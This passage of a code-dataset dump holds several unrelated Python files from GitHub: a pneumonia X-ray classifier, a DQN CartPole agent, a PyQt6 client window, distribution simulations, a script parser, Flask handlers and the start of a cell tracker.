width=70)\r\nbutton1.bind(\"\")\r\n\r\nbutton2 = ttk.Button(mywin, text=\"Copy\", command=copy_code)\r\nbutton2.place(x=270, y=10, 
width=60)\r\nbutton2.bind(\"\")\r\n\r\nmywin.mainloop()\r\n","repo_name":"georgimuhov/py","sub_path":"AdBlockGen.py","file_name":"AdBlockGen.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6500510396","text":"import os\nimport pandas as pd\nimport numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\n\nfrom sklearn.model_selection import train_test_split\nimport tensorflow as tf\n\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\nphysical_devices = tf.config.list_physical_devices('GPU')\ntf.config.experimental.set_memory_growth(physical_devices[0], True)\n\n\ndef AllFiles(DirPath, ext):\n targetList = list()\n for root, dirs, files in os.walk(DirPath):\n for f in files:\n if f[-len(ext):].lower() == ext:\n targetList.append(os.path.join(root, f))\n return targetList\n\n\ndef PreprocessData(PathList, img_size, data_gen=2, mode='train'):\n num_data = len(PathList) + data_gen * len(PathList)\n x_data = np.empty((num_data, img_size, img_size, 3))\n y_data = np.empty(num_data)\n\n generator = tf.keras.preprocessing.image.ImageDataGenerator(\n rotation_range=15,\n width_shift_range=0.1,\n height_shift_range=0.1,\n rescale=1. / 255,\n fill_mode='nearest'\n )\n\n for i, path in enumerate(PathList):\n img = cv2.imread(path)\n img = cv2.resize(img, (img_size, img_size))\n img = tf.keras.applications.efficientnet.preprocess_input(img) # using Efficient model\n x_data[i + data_gen * i] = img\n\n if mode == 'train':\n filename = path.split('\\\\')[-1]\n label = filename.split('_')\n label = category.index(label[1]) if len(label) > 1 else 0\n y_data[i + data_gen * i] = label\n\n if data_gen > 0:\n img = img.reshape(1, IMG_SIZE, IMG_SIZE, 3)\n\n batchs = generator.flow(\n img, batch_size=20\n )\n\n for k, aug in enumerate(batchs):\n if k == data_gen:\n break\n\n augImage = aug[0]\n augImage = tf.keras.applications.efficientnet.preprocess_input(augImage)\n x_data[i + (data_gen * i) + k] = augImage\n y_data[i + (data_gen * i) + k] = label\n\n # one-hot encoding\n if mode == 'train':\n y_data = tf.keras.utils.to_categorical(y_data, num_classes=num_classes)\n return x_data, y_data\n else:\n return x_data\n\n\ntrainDir = \".\\\\pneumonia\\\\train\\\\\"\ntestDir = \".\\\\pneumonia\\\\test\\\\\"\n\ntrainDatasets = AllFiles(trainDir, 'jpeg')\ntestDatasets = AllFiles(testDir, 'jpeg')\nx_trainPath, x_valPath = train_test_split(trainDatasets, test_size=0.2)\n\ncategory = ['normal', 'bacteria', 'virus']\n\n# Data Parameters\nnum_classes = 3\nIMG_SIZE = 200\n\nx_train, y_train = PreprocessData(x_trainPath, IMG_SIZE, data_gen=2)\nx_val, y_val = PreprocessData(x_valPath, IMG_SIZE, data_gen=0)\nx_test = PreprocessData(testDatasets, IMG_SIZE, data_gen=0, mode='test')\n# print(x_train.shape, y_train.shape)\n\n# create model\ntf.keras.backend.clear_session()\n\nbase_model = tf.keras.applications.EfficientNetB2(\n include_top=False,\n weights='imagenet',\n input_shape=(IMG_SIZE, IMG_SIZE, 3)\n)\n\n\nx = base_model.output\nx = tf.keras.layers.GlobalAveragePooling2D()(x)\nx = tf.keras.layers.Dense(256, activation=tf.nn.relu)(x)\nx = tf.keras.layers.Dropout(0.3)(x)\nx = tf.keras.layers.Dense(256, activation=tf.nn.relu)(x)\nx = tf.keras.layers.Dropout(0.3)(x)\nx = tf.keras.layers.Dense(256, activation=tf.nn.relu)(x)\nx = tf.keras.layers.Dropout(0.3)(x)\npredictions = tf.keras.layers.Dense(3, activation=tf.nn.softmax)(x)\nmodel = tf.keras.models.Model(base_model.input, predictions)\nmodel.summary()\n\nmodel.compile(\n 
optimizer='adam',\n loss=tf.keras.losses.categorical_crossentropy,\n metrics=[tf.keras.metrics.categorical_accuracy]\n)\n\nlogs = model.fit(\n x_train, y_train,\n batch_size=32,\n epochs=20,\n validation_data=(x_val, y_val)\n)\n\n# predictions = np.argmax(model.predict(x_test), axis=-1)\n# df = pd.DataFrame()\n# df['Id'] = [f'{i:05d}.jpeg' for i in range(len(x_test))]\n# df['Category'] = predictions.astype(int)\n# df.to_csv('submission.csv', index=False)\n","repo_name":"Sapphire0912/Programming","sub_path":"Python/Practice/DeepLearning/tensorflow practice/Handle_Pneumonia.py","file_name":"Handle_Pneumonia.py","file_ext":"py","file_size_in_byte":3986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17205163581","text":"import tensorflow as tf\nimport numpy as np\nimport gym\nimport random\nfrom collections import deque\n\n\n\"\"\"\n https://tf.wiki/zh/basic/models.html\n DQN for the CartPole balancing task\n\"\"\"\n\nenv = gym.make('CartPole-v1')\nstate = env.reset()\nprint(env.action_space.sample())\nprint(state)\n\n\n# while True:\n# env.render()\n# action = model.predict(state)\n# next_state, reward, done, info = env.step(action)\n# if done:\n# break\n\n\nnum_episodes = 50000 # total number of training episodes\nnum_exploration_episodes = 100 # number of episodes spent on exploration\nmax_len_episode = 1000000 # maximum number of steps per episode\n\nbatch_size = 256\nlearning_rate = 1e-3\ngamma = 1.\n\ninitial_epsilon = 1. # exploration rate at the start of exploration\nfinal_epsilon = 0.01 # exploration rate at the end of exploration\n\npool_size = 10000 # size of the experience replay buffer\n\n\nclass QNetwork(tf.keras.Model):\n def __init__(self):\n super().__init__()\n self.dense1 = tf.keras.layers.Dense(units=24, activation=tf.nn.relu)\n self.dense2 = tf.keras.layers.Dense(units=24, activation=tf.nn.relu)\n self.dense3 = tf.keras.layers.Dense(units=2)\n\n def call(self, inputs):\n x = self.dense1(inputs)\n x = self.dense2(x)\n x = self.dense3(x)\n return x\n\n def predict(self, inputs):\n q_values = self(inputs)\n return tf.argmax(q_values, axis=-1)\n\n\nif __name__ == '__main__':\n env = gym.make('CartPole-v1')\n\n model = QNetwork()\n optimizer = tf.keras.optimizers.Adam(learning_rate=learning_rate)\n replay_buffer = deque(maxlen=pool_size)\n\n epsilon = initial_epsilon\n\n for episode_id in range(num_episodes):\n state = env.reset()\n epsilon = max( # compute the current exploration rate; epsilon decays linearly as episodes progress\n initial_epsilon * (num_exploration_episodes - episode_id) / num_exploration_episodes,\n final_epsilon)\n\n for t in range(max_len_episode):\n env.render()\n\n # select action\n if random.random() < epsilon:\n action = env.action_space.sample()\n else:\n action = model.predict(np.expand_dims(state, axis=0)).numpy()\n action = action[0]\n\n next_state, reward, done, info = env.step(action)\n\n # on game over, give a large negative reward\n reward = -10. 
if done else reward\n replay_buffer.append((state, action, reward, next_state, 1 if done else 0))\n\n state = next_state\n\n if done:\n print(\"game_over, episode %d, epsilon %f, score %d\" % (episode_id, epsilon, t))\n break\n\n if len(replay_buffer) >= batch_size:\n batch_state, batch_action, batch_reward, batch_next_state, batch_done = zip(\n *random.sample(replay_buffer, batch_size))\n\n batch_state, batch_reward, batch_next_state, batch_done = \\\n [np.array(a, dtype=np.float32) for a in [batch_state, batch_reward, batch_next_state, batch_done]]\n batch_action = np.array(batch_action, dtype=np.int32)\n\n q_value = model(batch_next_state)\n\n # once the episode is done, no future reward is bootstrapped\n y = batch_reward + (gamma * tf.reduce_max(q_value, axis=1)) * (1 - batch_done)\n with tf.GradientTape() as tape:\n loss = tf.keras.losses.mean_squared_error(\n y_true=y,\n y_pred=tf.reduce_sum(model(batch_state) * tf.one_hot(batch_action, depth=2), axis=1)\n )\n grads = tape.gradient(loss, model.variables)\n optimizer.apply_gradients(grads_and_vars=zip(grads, model.variables))\n\n\n","repo_name":"haixiaoxuan/code-python","sub_path":"tf2.0/tf2/强化学习/01_平衡锤_dqn.py","file_name":"01_平衡锤_dqn.py","file_ext":"py","file_size_in_byte":3775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31159586938","text":"from PyQt6 import QtGui\nimport requests\n\nfrom PyQt6.QtWidgets import QToolBar, QStackedWidget, QLabel\nfrom PyQt6.QtGui import QIcon, QAction, QActionGroup, QPixmap\nfrom PyQt6.QtCore import Qt, QCoreApplication\n\nfrom windows.basic_window import BasicWindow, newIcon\nfrom windows.authentication_widget import LoginWidget\nfrom windows.function_widgets import ImageDetectionWidget, VideoDetectionWidget, VideoRecognitionWidget, PornRecognitionWidget\nfrom windows.user_service import PrivacyRegisterDialog, PrivacyDetectWidget\nfrom windows.admin_service import VideoAnalysisWidget\n\n\nclass MainWindow(BasicWindow):\n def __init__(self, ip:str, port:int):\n super().__init__()\n self.url = f\"http://{ip}:{port}\"\n self.login_widget = LoginWidget(self.url)\n self.login_widget.loginSignal.connect(self.try_login)\n self.login_status = False\n\n # define basic widget object\n self.image_detection_widget = ImageDetectionWidget(self.url)\n self.video_detection_widget = VideoDetectionWidget(self.url)\n self.video_recognition_widget = VideoRecognitionWidget(self.url)\n self.porn_recognition_widget = PornRecognitionWidget(self.url)\n\n # define admin widget object\n self.video_analysis_widget = VideoAnalysisWidget(self.url)\n\n # define user widget object\n self.privacy_registration_widget = PrivacyRegisterDialog(parent=self, url=self.url)\n self.privacy_detection_widget = PrivacyDetectWidget(url=self.url)\n\n # define basic actions\n self.image_detection_act = self.action(name=\"Image\\nDetection\", icon=\"image_detection.svg\")\n self.image_detection_act.setCheckable(True)\n self.video_detection_act = self.action(name=\"Video\\nDetection\", icon=\"video_detection.svg\")\n self.video_detection_act.setCheckable(True)\n self.video_recognition_act = self.action(name=\"Video\\nRecognition\", icon=\"video_detection.svg\")\n self.video_recognition_act.setCheckable(True)\n self.porn_recognition_act = self.action(name=\"Porn\\nRecognition\", icon=\"video_detection.svg\")\n self.porn_recognition_act.setCheckable(True)\n \n # define admin actions\n self.video_analysis_act = self.action(name=\"Video\\nAnalysis\", icon=\"video_detection.svg\")\n self.video_analysis_act.setCheckable(True)\n 
self.video_analysis_act.setVisible(False)\n\n # define user actions\n self.privacy_registration_act = self.action(name=\"Privacy\\nRegistration\", icon=\"privacy.svg\")\n self.privacy_registration_act.triggered.connect(self.privacy_registration_widget.exec)\n self.privacy_registration_act.setDisabled(True)\n self.privacy_detection_act = self.action(name=\"Privacy\\nDetection\", icon=\"search.svg\")\n # self.privacy_detection_act.triggerd.connect()\n self.app_logout = self.action(\"Logout\", icon=\"logout.svg\", tip=\"Logout\")\n self.app_logout.triggered.connect(self.try_logout)\n self.app_logout.setDisabled(True)\n self.app_quit = self.action(\"Quit\", icon=\"quit.svg\", shortcut=\"Ctrl+q\", tip=\"Quit Application\")\n self.app_quit.triggered.connect(self.quit)\n\n # create toolbar\n self.toolbar = QToolBar(\"Tool Bar\")\n self.toolbar.setContextMenuPolicy(Qt.ContextMenuPolicy.PreventContextMenu)\n self.toolbar.setToolButtonStyle(Qt.ToolButtonStyle.ToolButtonTextUnderIcon)\n self.toolbar.addAction(self.image_detection_act)\n self.toolbar.addAction(self.video_detection_act)\n self.toolbar.addAction(self.video_recognition_act)\n self.toolbar.addAction(self.porn_recognition_act)\n self.toolbar.addAction(self.video_analysis_act) # admin function\n self.toolbar.addSeparator()\n self.toolbar.addAction(self.privacy_registration_act)\n self.toolbar.addAction(self.app_logout)\n self.toolbar.addAction(self.app_quit)\n self.addToolBar(self.toolbar)\n\n # define action group\n self.action_group = QActionGroup(self.toolbar)\n self.action_group.addAction(self.image_detection_act)\n self.action_group.addAction(self.video_detection_act)\n self.action_group.addAction(self.video_recognition_act)\n self.action_group.addAction(self.porn_recognition_act)\n self.action_group.addAction(self.video_analysis_act)\n self.action_group.setExclusive(True)\n self.action_group.triggered.connect(self.change_mode)\n self.action_group.setDisabled(True) # disable until login\n\n self.user_action_group = QActionGroup(self.toolbar)\n self.user_action_group.addAction(self.privacy_registration_act)\n self.user_action_group.addAction(self.privacy_detection_act)\n self.user_action_group.addAction(self.app_logout)\n self.user_action_group.setVisible(False)\n\n # add widgets\n self.stacked_widget = QStackedWidget(self)\n self.stacked_widget.addWidget(self.image_detection_widget)\n self.stacked_widget.addWidget(self.video_detection_widget)\n self.stacked_widget.addWidget(self.video_recognition_widget)\n self.stacked_widget.addWidget(self.porn_recognition_widget)\n self.stacked_widget.addWidget(self.video_analysis_widget)\n self.stacked_widget.addWidget(self.login_widget) # login widget is always at last order of stacked widget\n self.stacked_widget.setCurrentIndex(self.stacked_widget.count()-1) # set login widget for default\n self.basic_layout.addWidget(self.stacked_widget)\n\n def action(self, name:str, icon:str=None, shortcut:str=None, tip:str=None) -> QAction:\n if icon:\n action = QAction(newIcon(icon), name, self)\n else:\n action = QAction(name, self)\n\n action.setObjectName(name)\n\n if shortcut:\n action.setShortcut(shortcut)\n if tip:\n action.setStatusTip(tip)\n\n return action\n\n def change_mode(self, action):\n action_list = self.action_group.actions()\n checked_action = self.action_group.checkedAction()\n pre_widget = self.stacked_widget.currentWidget()\n pre_index = self.stacked_widget.currentIndex()\n post_index = action_list.index(checked_action)\n\n if pre_index != post_index:\n pre_widget.upload_widget.clear()\n 
self.stacked_widget.setCurrentIndex(post_index)\n self.stacked_widget.setCurrentIndex(pre_index)\n self.stacked_widget.setCurrentIndex(post_index)\n\n def try_login(self, signal):\n if signal != 'admin' and not self.login_status:\n self.login_status = True\n self.privacy_registration_widget.set_userid(signal)\n self.privacy_registration_act.setEnabled(True)\n self.app_logout.setEnabled(True)\n\n self.action_group.setEnabled(True)\n self.image_detection_act.setChecked(True)\n self.stacked_widget.setCurrentIndex(0)\n\n self.user_action_group.setVisible(True)\n\n elif signal == 'admin' and not self.login_status:\n self.login_status = True\n self.app_logout.setEnabled(True)\n\n self.action_group.setEnabled(True)\n self.video_analysis_act.setVisible(True)\n self.video_analysis_act.setChecked(True)\n self.stacked_widget.setCurrentIndex(self.stacked_widget.count()-2) # set video analysis for default\n\n def try_logout(self):\n response = requests.get(url=f\"{self.url}/logout\")\n result = response.json()['result']\n if result: # to login widget\n self.login_status = False\n pre_widget = self.stacked_widget.currentWidget()\n pre_index = self.stacked_widget.currentIndex()\n pre_widget.upload_widget.clear()\n self.action_group.checkedAction().setChecked(False)\n\n self.stacked_widget.setCurrentIndex(self.stacked_widget.count()-1)\n self.stacked_widget.setCurrentIndex(pre_index)\n self.stacked_widget.setCurrentIndex(self.stacked_widget.count()-1)\n\n self.video_analysis_act.setVisible(False)\n self.privacy_registration_act.setDisabled(True)\n self.app_logout.setDisabled(True)\n self.action_group.setDisabled(True)\n\n try:\n self.toolbar.removeAction(self.video_analysis_act)\n except:\n pass\n\n # self.removeToolBar(self.toolbar)\n # self.removeToolBar(self.admin_toolbar)\n\n def quit(self):\n if self.login_status:\n self.try_logout()\n QCoreApplication.instance().quit()\n\n def closeEvent(self, event):\n self.quit()\n super().closeEvent(event)\n\n\nif __name__ == \"__main__\":\n import sys\n from PyQt6.QtWidgets import QApplication\n app = QApplication(sys.argv)\n window = MainWindow(ip='192.168.1.230', port=18400)\n window.show()\n\n app.exec()\n\n\nr\"\"\"\nTODO\n1. 
개인정보 등록과 로그아웃 하나의 action_group으로\n\"\"\"","repo_name":"HJpunch/DeepPrivacy","sub_path":"windows/main_window.py","file_name":"main_window.py","file_ext":"py","file_size_in_byte":8967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22735682528","text":"from scipy.stats import uniform\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport random\nimport math\n\nfig, ax = plt.subplots(1, 1)\nintervals = [10, 100, 1000, 5000, 10000, 20000]\nseeds = [66, 67]\n\n\nzeros = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n\n\ndef dict_init(a):\n return dict(enumerate(a))\n\n\ndef interval(a, dic, step):\n for number in a:\n key = math.trunc((number-14666)/step)\n dic[key] += 1\n\n\ndef print_count(a, step):\n dic = dict_init(zeros)\n interval(a, dic, step)\n print(dic)\n\n\ndef generate_uniform(a, b, size, seed):\n l = []\n random.seed(seed)\n for i in range(size):\n number = random.uniform(a, b)\n l.append(number)\n return l\n\n\ndef generate_expon(number, lambd, seed):\n l = []\n random.seed(seed)\n for i in range(number):\n number = random.expovariate(lambd)\n if number > 285334:\n number = 285334\n l.append(14666 + number)\n return l\n\n\ndef generate_gamma(number, lambd, seed):\n l = []\n random.seed(seed)\n for i in range(number):\n number = random.gammavariate(3, lambd)\n if number > 285334:\n number = 285334\n l.append(14666 + number)\n return l\n\n\ndef uniform_deviation():\n for seed in seeds:\n np.random.seed(seed)\n for interval in intervals:\n e = generate_uniform(14666, 161334, interval, seed)\n print_count(e, 14666.8)\n\n r = np.asarray(e)\n plt.hist(r, bins=10)\n plt.title(\"Interval - {}. Mean: {}. Seed: {}\".format(interval, round(r.mean(), 3), seed))\n plt.show()\n print('Mean for interval {} is {}'.format(interval, r.mean()))\n print('Standard deviation for interval {} is {}'.format(interval, r.std()))\n print('Koefficient variacii for interval {} is {}\\n'.format(interval, r.std()/r.mean()))\n print(''.join(['-' for x in range(80)]))\n\n\ndef exponential_deviation():\n for seed in seeds:\n for interval in intervals:\n e = generate_expon(interval, 1/73334, seed)\n print_count(e, 28554)\n\n r = np.asarray(e)\n plt.hist(r, bins=10)\n plt.title(\"Interval - {}. Mean: {}. Seed: {}\".format(interval, r.mean(), seed))\n plt.show()\n print('Mean for interval {} is {}'.format(interval, r.mean()))\n print('Standard deviation for interval {} is {}'.format(interval, r.std()))\n print('Koefficient variacii for interval {} is {}\\n'.format(interval, r.std()/r.mean()))\n print(''.join(['-' for x in range(80)]))\n\n\ndef erlang_deviation():\n for seed in seeds:\n np.random.seed(seed)\n for interval in intervals:\n e = generate_gamma(interval, 24445, seed)\n print_count(e, 28554)\n\n e = np.asarray(e)\n plt.hist(e, bins=10)\n plt.title(\"Interval - {}. Mean: {}. 
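The MainWindow above keeps one checkable QAction per page and maps the checked action's position in the QActionGroup to a QStackedWidget index. A stripped-down, self-contained sketch of that pattern (widget names here are illustrative, not from the project):

import sys
from PyQt6.QtWidgets import QApplication, QMainWindow, QToolBar, QStackedWidget, QLabel
from PyQt6.QtGui import QAction, QActionGroup

app = QApplication(sys.argv)
win = QMainWindow()
stack = QStackedWidget()
toolbar = QToolBar("Tool Bar")
group = QActionGroup(toolbar)
group.setExclusive(True)  # only one mode can be checked at a time

for name in ("Image", "Video"):
    stack.addWidget(QLabel(f"{name} page"))
    act = QAction(name, win)
    act.setCheckable(True)
    toolbar.addAction(act)
    group.addAction(act)

# Switch pages by mapping the checked action's position to a stack index.
group.triggered.connect(lambda a: stack.setCurrentIndex(group.actions().index(a)))
win.addToolBar(toolbar)
win.setCentralWidget(stack)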
Seed: {}\".format(interval, e.mean(), seed))\n plt.show()\n print('Mean for interval {} is {}'.format(interval, e.mean()))\n print('Standard deviation for interval {} is {}'.format(interval, e.std()))\n print('Koefficient variacii for interval {} is {}\\n'.format(interval, e.std()/e.mean()))\n print(''.join(['-' for x in range(80)]))\n\nerlang_deviation()\n","repo_name":"kobylyanskiy/modelling","sub_path":"lab1.py","file_name":"lab1.py","file_ext":"py","file_size_in_byte":3293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71080563394","text":"from eggscript_src.config import get_config\nfrom eggscript_src.expressions.expression import Expression\nfrom eggscript_src.regex import closing_curly_bracket_token, closing_parenthesis_token, opening_curly_bracket_token, semicolon_token, valid_conditional\n\nclass ConditionalExpression(Expression):\n\tdef __init__(self, tokenizer=None):\n\t\tsuper().__init__(tokenizer=tokenizer)\n\t\tself.conditional_expressions = []\n\t\tself.is_code_block = True\n\t\tself.type = \"\"\n\t\n\tdef __str__(self):\n\t\treturn f\"ConditionalExpression({self.type}, {self.conditional_expressions}, {self.expressions})\"\n\t\n\tdef __repr__(self):\n\t\treturn self.__str__()\n\n\tdef move_expressions(self):\n\t\tself.conditional_expressions = self.expressions\n\t\tself.expressions = []\n\t\n\tdef to_script(self):\n\t\tfull_output = \"\"\n\n\t\tnewline = \"\\n\"\n\t\tspace = \" \"\n\t\ttab = \"\\t\"\n\t\tif get_config(\"minify\") == True:\n\t\t\tnewline = \"\"\n\t\t\tspace = \"\"\n\t\t\ttab = \"\"\n\t\t\n\t\tif self.type != \"else\":\n\t\t\toutput = \"\"\n\t\t\tfor conditional_expression in self.conditional_expressions:\n\t\t\t\toutput = output + conditional_expression.to_script()\n\t\t\t\n\t\t\tfull_output = self.type + \"(\" + output + \")\" + space + \"{\" + newline\n\t\telse:\n\t\t\tfull_output = self.type + space + \"{\" + newline\n\t\t\n\t\toutput = \"\"\n\t\tfor expression in self.expressions:\n\t\t\toutput = output + (tab * self.get_indent_level()) + expression.to_script() + newline\n\t\t\n\t\tfull_output = full_output + output + (tab * (self.get_indent_level() - 1)) + \"}\"\n\n\t\treturn full_output\n\t\n\tdef read_expression(tokenizer, tree):\n\t\texpression = ConditionalExpression(tokenizer=tokenizer)\n\t\ttokenizer.file.give_character_back()\n\t\tif tokenizer.buffer == \"else\":\n\t\t\ttokenizer.buffer = tokenizer.buffer + \" \" + tokenizer.file.read_character() + tokenizer.file.read_character()\n\t\t\tif tokenizer.buffer != \"else if\":\n\t\t\t\ttokenizer.file.give_character_back(ignore_whitespace=True)\n\t\t\t\ttokenizer.file.give_character_back(ignore_whitespace=True)\n\n\t\t\t\ttokenizer.buffer = \"else\"\n\t\t\n\t\texpression.type = tokenizer.buffer\n\n\t\tif tokenizer.buffer != \"else\":\n\t\t\ttokenizer.file.read_character() # absorb first \"(\"\n\t\t\ttokenizer.tokenize(stop_ats=[closing_parenthesis_token], tree=expression)\n\t\t\texpression.move_expressions()\n\n\t\ttokenizer.tokenize(give_back_stop_ats=[opening_curly_bracket_token, semicolon_token], tree=expression)\n\n\t\t# figure out if this is a single line if-statement or not\n\t\tif tokenizer.file.read_character() == \"{\":\n\t\t\ttokenizer.tokenize(stop_ats=[closing_curly_bracket_token], tree=expression)\n\t\telse:\n\t\t\ttokenizer.file.give_character_back()\n\n\t\treturn expression\n\nExpression.add_keyword_regex(valid_conditional, 
ConditionalExpression)","repo_name":"bansheerubber/eggscript","sub_path":"eggscript_src/expressions/conditional_expression.py","file_name":"conditional_expression.py","file_ext":"py","file_size_in_byte":2590,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"20674144475","text":"import datapane as dp\nimport pandas as pd\n\n\nfilename = \"data/processed/merged_data_ay_2020_21.pkl\"\ndf = pd.read_pickle(filename)\n\ngender_age_breakdown = pd.crosstab(\n [df.C_Gender__c, df.C_Age__c],\n df.RT_RecordType__c,\n margins=True,\n colnames=[\"Student Type\"],\n rownames=[\"Gender\", \"Age\"],\n margins_name=\"Total\",\n)\n\nreport = dp.Report(\n dp.Page(\n title=\"FY21 EOY\",\n blocks=[\n \"### Dataset\",\n dp.Text(file=\"reports/fy21_eoy.md\").format(\n gender_age_breakdown=gender_age_breakdown\n ),\n dp.Table(gender_age_breakdown),\n ],\n ),\n)\n\nreport.upload(name=\"Test\", open=True)\n# executive_summary_pt1 = open(\"text/executive_summary_pt1.md\", \"r\").read()\n","repo_name":"College-Track/one-off","sub_path":"2022/uw_sela_fy22/reports/dp_report.py","file_name":"dp_report.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22797213588","text":"from flask import current_app, request, jsonify\n\nfrom app.models import UserModel, DescriptionModel\n\nfrom app.exc.missing_key import MissingKeyError\nfrom app.exc.required_key import RequiredKeyError\n\nfrom app.services.helper_service import verify_required_key, verify_missing_key\n\n\ndef update_description(user_id: int):\n\n required_keys = [\"experience\", \"trait\", \"paint\", \"description\", \"studio_name\"]\n\n session = current_app.db.session\n\n data = request.get_json()\n\n if verify_required_key(data, required_keys):\n raise RequiredKeyError(data, required_keys)\n\n if verify_missing_key(data, required_keys):\n raise MissingKeyError(data, required_keys)\n\n user = UserModel.query.get(user_id)\n\n if not user:\n return {\"status\": \"User NOT FOUND\"}\n\n found_description = DescriptionModel.query.get(user.description_id)\n\n for key, value in data.items():\n setattr(found_description, key, value)\n\n session.add(found_description)\n session.commit()\n\n return jsonify(found_description)\n\n\n\ndef update_description_id_in_user(user_id: int, description_id: int) -> None:\n \n session = current_app.db.session\n\n user = UserModel.query.get(user_id)\n\n if not user:\n return {\"status\": \"User NOT FOUND\"}\n\n user.description_id = description_id\n\n session.add(user)\n session.commit()\n\n\ndef update_is_artist(user_id) -> None:\n\n session = current_app.db.session\n\n user = UserModel.query.get(user_id)\n\n if user.is_artist == True:\n user.is_artist = False\n if user.is_artist == False:\n user.is_artist = True\n\n session.add(user)\n session.commit()\n\n\ndef get(user_id):\n\n user = UserModel.query.get(user_id)\n\n description = DescriptionModel.query.get(user.description_id)\n\n return jsonify(description)\n\n\ndef post(user_id):\n\n session = current_app.db.session\n\n data = request.get_json()\n\n\n description = DescriptionModel(**data)\n\n session.add(description)\n session.commit()\n\n update_description_id_in_user(user_id, description.id)\n \n return jsonify(description)\n\n\ndef delete(user_id):\n\n session = current_app.db.session\n\n user = UserModel.query.get(user_id)\n\n update_is_artist(user_id)\n\n description = 
DescriptionModel.query.get(user.description_id)\n\n if not description.id == user.description_id:\n return {\"error\": \"You're not allowed to delete other users descriptions\"}\n\n session.delete(description)\n session.commit()\n\n return \"\"","repo_name":"carlosbentz/seek-tattoo","sub_path":"app/services/description_service.py","file_name":"description_service.py","file_ext":"py","file_size_in_byte":2478,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"7078109824","text":"import os\nimport pickle\n\nimport numpy as np\nfrom scipy.interpolate import interp1d\n\nfrom tracking.cell import Cell\nfrom utils.files import get_key_labels_files\n\n\nclass CellTracker:\n def __init__(self, folder_path: str, cells: list) -> None:\n self.folder_path = folder_path\n self.cells = cells\n\n def get_cell_coordinates(self, line: str) -> list:\n return list(map(float, line.split(\" \")[1:3]))\n\n def get_cell_position(self, filename: str) -> list:\n with open(self.folder_path + \"\\\\\" + filename) as f:\n return list(map(self.get_cell_coordinates, f.readlines()))\n\n def initialize_cells(self):\n initial_file = os.listdir(self.folder_path)[0]\n for index, cell_position in enumerate(\n self.get_cell_position(filename=initial_file)\n ):\n cell = Cell(number_id=index + 1)\n cell.positions[0] = cell_position\n self.cells.append(cell)\n\n def get_nearest_cell(self, coordinates: list) -> Cell:\n nearest_cell = self.cells[0]\n distance_min = nearest_cell.get_distance(coordinates=coordinates)\n\n for cell in self.cells[1:]:\n if cell.get_distance(coordinates=coordinates) < distance_min:\n nearest_cell = cell\n distance_min = cell.get_distance(coordinates=coordinates)\n\n return nearest_cell\n\n def associate_next_coords_to_cells(self, filename: str) -> dict:\n cell_coords_mapping = {}\n for coordinates in self.get_cell_position(filename=filename):\n nearest_cell = self.get_nearest_cell(coordinates=coordinates)\n\n if nearest_cell not in cell_coords_mapping.keys():\n cell_coords_mapping.update({nearest_cell: [coordinates]})\n\n else:\n cell_coords_mapping[nearest_cell].append(coordinates)\n\n return cell_coords_mapping\n\n def create_cells_if_multiple_coords(self, cell_coords_mapping: dict) -> dict:\n cells_with_multiple_coords = {\n key: value for key, value in cell_coords_mapping.items() if len(value) > 1\n }\n for cell, all_coordinates in cells_with_multiple_coords.items():\n all_diff = list(map(cell.get_distance, all_coordinates))\n selected_coords = all_coordinates[all_diff.index(min(all_diff))]\n other_coords = [\n coords for coords in all_coordinates if coords != selected_coords\n ]\n\n cell_coords_mapping.update({cell: [selected_coords]})\n for coords in other_coords:\n new_cell = Cell(number_id=len(self.cells) + 1)\n self.cells.append(new_cell)\n cell_coords_mapping.update({new_cell: [coords]})\n\n return cell_coords_mapping\n\n def set_new_positions(self, frame: int, cell_coords_mapping: dict):\n for cell in cell_coords_mapping:\n cell.positions[frame+1] = cell_coords_mapping[cell][0]\n\n def track(self):\n files = sorted(os.listdir(self.folder_path)[1:], key=get_key_labels_files)\n for frame, filename in enumerate(files):\n cell_coords_mapping = self.associate_next_coords_to_cells(filename=filename)\n cell_coords_mapping = self.create_cells_if_multiple_coords(\n cell_coords_mapping=cell_coords_mapping\n )\n self.set_new_positions(frame=frame, cell_coords_mapping=cell_coords_mapping)\n\n def interpolate_missing_coordinates(self):\n for cell 
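update_description above copies every key of the JSON payload onto the model with setattr after validating the key set. A framework-free sketch of that pattern, with a whitelist standing in for the required-key checks (all names hypothetical):

def apply_updates(instance, data: dict, allowed: set):
    # Copy each whitelisted field onto the object, mirroring the setattr loop above.
    for key, value in data.items():
        if key in allowed:
            setattr(instance, key, value)
    return instance

class Row:  # stand-in for a SQLAlchemy model in this sketch
    experience = None
    trait = None

row = apply_updates(Row(), {"experience": "5y", "trait": "fine line"}, {"experience", "trait"})
print(row.experience, row.trait)  # 5y fine line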
